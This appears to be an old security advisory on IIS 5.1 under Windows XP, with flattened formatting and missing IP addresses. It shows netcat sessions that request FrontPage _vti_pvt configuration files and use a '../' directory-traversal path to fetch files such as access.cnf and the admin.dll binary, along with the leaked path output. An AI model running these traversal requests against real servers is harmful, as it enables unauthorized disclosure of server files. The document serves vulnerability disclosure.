COMMAND IIS path & directory traversal issues SYSTEMS AFFECTED Windows XP with IIS 5.1 PROBLEM In NtWaK0 [http://www.SafeHack.com] advisory : Identify WEB DIR installation. By sending this \"GET /_vti_pvt/access.cnf\" you can identify the web installation. As we all know this is a helpfull peace of information if someone is going to attack your web site. Multiple .cnf are at cause. Exploits : ======== C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /_vti_pvt/access.cnf vti_encodingSR|utf8-nl RealmNameLAMER InheritPermissionsfalse PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt Their is another security issue with this too. \"InheritPermissionsfalse\" This will tell security inheritance of that folder. C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /_vti_pvt/botinfs.cnf vti_encodingSR|utf8-nl D\\\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\Web Server Extensions\\\\ 40\\\\bots\\\\vinavbar\\\\vinavbar.infVW|vinavbar C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /_vti_pvt/bots.cnf vti_encodingSR|utf8-nl vinavbarVW|D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft\\\\ Shared \\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar\\\\\\\\vinavbar.inf vinavbar E I info N D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft \\\\ Shared\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar \\\\\\\\fp4Avnb.dll -Also- Using GET /iishelp/common/colegal.htm you can access other files. under the web structure. I did not have chance to test it on file above the web structure. Like I said I do not run IIS 5.1 but a friend does. One of these days I am going to buy more memory for some of my old box and Exploits : ======== C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf vti_encodingSR|utf8-nl RealmNameLAMER InheritPermissionsfalse PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt writeto.cnf [Extracted From] http//www.microsoft.com/technet/treeview/default.asp?url=/TechNet/ prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp Back links for files that can be written to by users of the web, such as Save Results Form handler result files. Files that can be written to by users of the web have a looser security setting than regular web content. C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode. $ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ? P ? ¿- ? ? ? ? ? ? ? » (? P 0 P? C\\Tool>nc -v -n 81 (UNKNOWN) [] 81 (?) open GET /_vti_pvt/linkinfo.cnf vti_encodingSR|utf8-nl javascript\\loadhelpfront();localstart.asp javascript\\activate(<%=iver%>);localstart.asp http\\//www.safehack.comindex.htm /iishelp/common/colegal.htmlocalstart.asp SOLUTION None yet.